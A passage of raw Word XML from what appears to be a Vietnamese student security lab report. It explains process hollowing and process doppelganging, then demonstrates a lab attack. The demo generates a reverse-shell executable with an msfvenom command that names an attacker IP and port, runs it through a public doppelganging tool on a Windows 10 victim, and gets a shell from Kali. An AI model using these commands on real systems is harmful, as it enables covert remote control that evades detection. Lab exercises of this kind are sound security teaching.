          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3DC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Process Hollowing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0207968E" w14:textId="5BA325AA" w:rsidR="00BD3DC7" w:rsidRDefault="00BD3DC7" w:rsidP="00BD3DC7">
      <w:r>
        <w:t xml:space="preserve">Process Hollowing: </w:t>
      </w:r>
      <w:r>
        <w:t>là quá trình l</w:t>
      </w:r>
      <w:r>
        <w:t>iên quan đến việc tạo một process mới bị treo và sau đó thay thế mã và dữ liệu hợp pháp của nó bằng mã và dữ liệu độc hại. Sau khi process đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc tiếp tục, nó sẽ thực thi mã đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>a vào, che giấu hiệu quả sự hiện diện của phần mềm độc hại trong một process hợp pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78276C65" w14:textId="1E50CBB0" w:rsidR="00BD3DC7" w:rsidRDefault="00EF493C" w:rsidP="00BD3DC7">
      <w:r>
        <w:t>Phương pháp thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C13AC30" w14:textId="65C699EC" w:rsidR="00EF493C" w:rsidRDefault="00EF493C" w:rsidP="00EF493C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tìm và tạo 1 tiến trình mới ở trạng thái suspend</w:t>
      </w:r>
      <w:r w:rsidR="00BD3DC7">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tìm một quá trình hợp pháp mà muốn che giấu mã độc của mình. Thông th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ờng, quá trình này đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc chọn dựa trên tính chất của ứng dụng và cấu hình hệ thống</w:t>
      </w:r>
      <w:r>
        <w:t>. Sau đó thực hiện sao chép tiến trình này ra 1 tiến trình mới ở trạng thái suspend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F42E5" w14:textId="0B4B89B1" w:rsidR="00EF493C" w:rsidRDefault="00EF493C" w:rsidP="00EF493C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện xoá nội dung </w:t>
      </w:r>
      <w:r>
        <w:t>(unmapping/hollowing):</w:t>
      </w:r>
      <w:r w:rsidR="004564CD">
        <w:t xml:space="preserve"> Quá trình này sẽ thực hiện “khoét tiến trình” vừa mới tạo ra nhằm tạo trống để thực hiện cho việc tiêm tiên trình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FFF64" w14:textId="65BBE403" w:rsidR="00BD3DC7" w:rsidRDefault="004564CD" w:rsidP="00BD3DC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiêm payload độc hại vào trong phần bộ nhớ: Sau khi đã thực hiện đục khoét thì sẽ thực hiện quá trình tiêm payload độc hại vào trong bộ nhớ bằng cách sử dụng các hàm </w:t>
      </w:r>
      <w:r>
        <w:t>VirtualAllocEx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (để xác định vùng nhớ mới) và </w:t>
      </w:r>
      <w:r>
        <w:t>WriteProcessMemory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (để thực hiện tiêm mã độc vào vùng nhớ trống được chỉ định)</w:t>
      </w:r>
      <w:r w:rsidR="00206669">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6451FC" w14:textId="440887A0" w:rsidR="004564CD" w:rsidRDefault="004564CD" w:rsidP="00BD3DC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thực thi tiến trình mới: Sau khi đã hoàn thành các bước trên thì sẽ thực hiện chạy tiến trình mới với nội dung độc hại từ payload và chức năng hợp pháp của tiến trình ban đầu</w:t>
      </w:r>
      <w:r w:rsidR="00206669">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B859FE" w14:textId="77777777" w:rsidR="00206669" w:rsidRDefault="00206669" w:rsidP="00206669"/>
    <w:p w14:paraId="6CCB0455" w14:textId="43721715" w:rsidR="00206669" w:rsidRDefault="00206669" w:rsidP="00206669">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206669">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process Doppelganging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F30F4E" w14:textId="0FD089F2" w:rsidR="00206669" w:rsidRDefault="00206669" w:rsidP="00206669">
      <w:r>
        <w:t xml:space="preserve">Process Doppelganging </w:t>
      </w:r>
      <w:r>
        <w:t>là một kĩ thuật tấn công không tập tin - fileless attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bằng cách sử dụng các NTFS Transaction và NTFS reparse points để khởi chạy một tiến trình độc hại thông qua việc thay thế bộ nhớ của một tiến trình trình hợp pháp, từ đó có thể trốn tránh phát hiện</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>NTFS Transaction là tính năng cung cấp c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ơ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chế transaction cho hệ thống NTFS, phép nhiều process truy cập và chỉnh sửa cùng lúc và đảm bảo tính nhất quán </w:t>
      </w:r>
      <w:r>
        <w:t>và đảm bảo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an toàn của dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E92A5" w14:textId="5D9DA2B6" w:rsidR="006C689D" w:rsidRDefault="006C689D" w:rsidP="00206669">
      <w:r>
        <w:t>Phương pháp thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C9C453" w14:textId="7B6EB839" w:rsidR="006C689D" w:rsidRDefault="006C689D" w:rsidP="006C689D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Transact: Đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>a 1 file thực thi hợp lệ vào NTFS transaction (một không gian cách li) và overwrite file này bằng malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D62A5" w14:textId="1A1190A7" w:rsidR="006C689D" w:rsidRDefault="006C689D" w:rsidP="006C689D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Load: Tạo ra một section trong ô nhớ d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ới thân phận của file thực thi hợp lệ. Lấy Malicious code ra và đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>a vào trong section đã tạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E0537" w14:textId="4B62BBDD" w:rsidR="006C689D" w:rsidRDefault="006C689D" w:rsidP="006C689D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rollback: Sử dụng chức năng rollback của NTFS để trả lại file thực thi hợp lệ ban đầu, loại bỏ toàn bộ phần maliicous code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C1FE0" w14:textId="311C3461" w:rsidR="006C689D" w:rsidRPr="00206669" w:rsidRDefault="006C689D" w:rsidP="006C689D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Animate: Tạo ra 1 process từ section chứa malicious code đã bị ghi ở b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ớc 2 trong bộ nhớ và tiến hành thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE0D34" w14:textId="77777777" w:rsidR="004564CD" w:rsidRDefault="004564CD" w:rsidP="004564CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089DF498" w14:textId="77777777" w:rsidR="004760AA" w:rsidRDefault="004760AA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A53D49" w14:textId="150F578A" w:rsidR="00516A30" w:rsidRDefault="00516A30" w:rsidP="00516A30">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Yêu cầu 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C39633" w14:textId="3E66117F" w:rsidR="0009609D" w:rsidRPr="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r w:rsidRPr="0009609D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Video demo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="009A3454">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/m</w:t>
        </w:r>
        <w:r w:rsidRPr="009A3454">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>P</w:t>
        </w:r>
        <w:r w:rsidRPr="009A3454">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>qGGSOGzcM</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="099D398D" w14:textId="77777777" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D6A00F" w14:textId="1703D8B4" w:rsidR="00643D86" w:rsidRPr="0009609D" w:rsidRDefault="00225963" w:rsidP="00516A30">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009609D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Môi trường thực nghiệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A03D9" w14:textId="2405BFB9" w:rsidR="00225963" w:rsidRDefault="00225963" w:rsidP="00516A30">
      <w:r>
        <w:t>Máy nạn nhân: Window 10 32 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D522533" w14:textId="1AFF0B7D" w:rsidR="00225963" w:rsidRDefault="00225963" w:rsidP="00516A30">
      <w:r>
        <w:t>Máy tấn công: Kali Linux 2023.2 64 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520D31FB" w14:textId="77777777" w:rsidR="00225963" w:rsidRDefault="00225963" w:rsidP="00516A30"/>
    <w:p w14:paraId="719862B1" w14:textId="6F9A771E" w:rsidR="0009609D" w:rsidRPr="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009609D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCD102C" w14:textId="670954ED" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r>
        <w:t xml:space="preserve">Đầu tiên ta cần phải thực hiện tạo file thực thi có chữa mã độc bằng lệnh: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758EF185" w14:textId="12F0E1B7" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r w:rsidRPr="0009609D">
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=1234 -f exe &gt; hello.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F44DA50" w14:textId="146B0425" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C29D10B" wp14:editId="63666F7A">
            <wp:extent cx="6154103" cy="1623060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="449081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1398" name="Picture 1"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 t="19494" r="65857" b="64556"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6156683" cy="1623740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99F3D0" w14:textId="5B8839CA" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r>
        <w:t xml:space="preserve">Sau khi tạo xong ta có được file hello.exe, với code này ta sẽ thể thực hiện gọi 1 reverse shell qua giao thức tcp để máy Kali Linux có thể điều khiển với ip là máy Kali là 192.168.253.153 port 1234 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA2B9E" w14:textId="2B979395" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r w:rsidRPr="0009609D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7105830F" wp14:editId="3DF2EDBD">
            <wp:extent cx="6115050" cy="4858385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26797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70759" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4858385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC108F" w14:textId="675D412E" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r>
        <w:t xml:space="preserve">Sau đó thực hiện gửi sang máy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61914C8E" w14:textId="3B09D25A" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02D7A0F3" wp14:editId="76EA6649">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="12807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21540" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3439795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CDD71E" w14:textId="591E606F" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sau đó ta tải bản release demo process dopppelganging từ nguồn: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="009A3454">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/hasherezade/process_doppelganging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F1F2CBE" w14:textId="5F706938" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7681801A" wp14:editId="6548D092">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="669861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1142" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3439795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="172BDF84" w14:textId="1713BCE4" w:rsidR="0009609D" w:rsidRDefault="0009609D" w:rsidP="00516A30">
      <w:r>
        <w:t>Sau khi tải xong ta sẽ thực hiện chạy với lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B11FAD1" w14:textId="68C59E7C" w:rsidR="005D61F0" w:rsidRDefault="005D61F0" w:rsidP="00516A30">
      <w:r>
        <w:t>proc_doppel32.exe hello.exe my.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB977BD" w14:textId="1C2AC858" w:rsidR="005D61F0" w:rsidRDefault="005D61F0" w:rsidP="00516A30">
      <w:r>
        <w:t xml:space="preserve">Với việc sử dụng bản release của tác giả </w:t>
      </w:r>
      <w:r w:rsidRPr="005D61F0">
        <w:t>hasherezade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ta có thể tạo ra 1 tiến trình notepad hợp lệ và bên cạnh đó có một tiến trình không hợp lệ là hello.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA510D" w14:textId="6AE5A514" w:rsidR="0009609D" w:rsidRDefault="005D61F0" w:rsidP="00516A30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7640D865" wp14:editId="5C5E2DCB">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="10278928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92815"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3A30BB27" w14:textId="0914761A" w:rsidR="005D61F0" w:rsidRDefault="005D61F0" w:rsidP="00516A30">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau khi chạy xong ta sẽ kiểm tra bên máy Kali Linux thì ta có được reverse shell và ta sẽ chạy thử một số lệnh như whoami, ls, tasklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FF9139" w14:textId="24FEC75F" w:rsidR="005D61F0" w:rsidRDefault="005D61F0" w:rsidP="00516A30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A09F344" wp14:editId="17DF8F37">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="6666901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0169"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09F909E9" w14:textId="6D74D8C4" w:rsidR="005D61F0" w:rsidRDefault="005D61F0" w:rsidP="00516A30">
      <w:r>
        <w:t xml:space="preserve">Ta thấy có tên máy là desktop-h7q6ubi\acer, kiểm tra lại bên máy window thì ta thấy trùng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>khớp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2009FFF2" w14:textId="50A18E48" w:rsidR="005D61F0" w:rsidRDefault="005D61F0" w:rsidP="00516A30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68DDD1C8" wp14:editId="64DB324B">
            <wp:extent cx="6098743" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="8746463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46310" name="Picture 4"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63356" r="73333" b="25568"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6105858" cy="1426602"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61182BD1" w14:textId="04EB7663" w:rsidR="004D33FE" w:rsidRDefault="006B7F19" w:rsidP="00516A30">
      <w:r>
        <w:t>Demo hoàn thành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF30E5" w14:textId="77777777" w:rsidR="00532DC8" w:rsidRPr="00516A30" w:rsidRDefault="00532DC8" w:rsidP="00516A30"/>
    <w:p w14:paraId="5B956D87" w14:textId="6BE026BD" w:rsidR="004A1128" w:rsidRDefault="00BA539D" w:rsidP="003D47DD">
      <w:r>
        <w:t>Các bước thực hiện/ Phương pháp thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="00860B97">
        <w:t>/Nội dung tìm hiểu</w:t>
      </w:r>
      <w:r w:rsidR="00E95D5E">
        <w:t xml:space="preserve"> (Ảnh chụp màn hình, có giải thích)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE1ABD" w14:textId="77777777" w:rsidR="003D47DD" w:rsidRPr="00F13188" w:rsidRDefault="003D47DD" w:rsidP="003D47DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65723B19" w14:textId="71CDFC26" w:rsidR="00BA539D" w:rsidRDefault="00BA539D" w:rsidP="00BA539D"/>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4AFAA528" w14:textId="77777777" w:rsidR="00F54C0C" w:rsidRDefault="00F54C0C" w:rsidP="00F54C0C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="450" w:hanging="450"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pP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275329BF" w14:textId="77777777" w:rsidR="00F54C0C" w:rsidRDefault="00F54C0C" w:rsidP="00F54C0C">
      <w:pPr>
        <w:pStyle w:val="NoiDung"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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77777777" w:rsidR="00F54C0C" w:rsidRDefault="00F54C0C" w:rsidP="00F54C0C">
      <w:pPr>
        <w:pStyle w:val="NoiDung"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:r w:rsidRPr="004657A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.DOCX và .PDF</w:t>
      </w:r>
      <w:r>
        <w:t>. Tập trung vào nội dung, không mô tả lý thuyết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B932DA" w14:textId="77777777" w:rsidR="00F54C0C" w:rsidRDefault="00F54C0C" w:rsidP="00F54C0C">
      <w:pPr>
        <w:pStyle w:val="NoiDung"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nội dung trình bày bằng</w:t>
      </w:r>
      <w:r w:rsidRPr="004657A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Font chữ Times New Roman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>s/ hoặc font chữ của mẫu báo cáo này (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0023A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>UTM Neo Sans Intel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/UTM Viet Sach)– cỡ chữ</w:t>
      </w:r>
      <w:r w:rsidRPr="004657A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0762">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Canh đều (Justify) cho văn bản.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Canh giữa (Center) cho ảnh chụp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E07B55" w14:textId="77777777" w:rsidR="00F54C0C" w:rsidRDefault="00F54C0C" w:rsidP="00F54C0C">
      <w:pPr>
        <w:pStyle w:val="NoiDung"/>
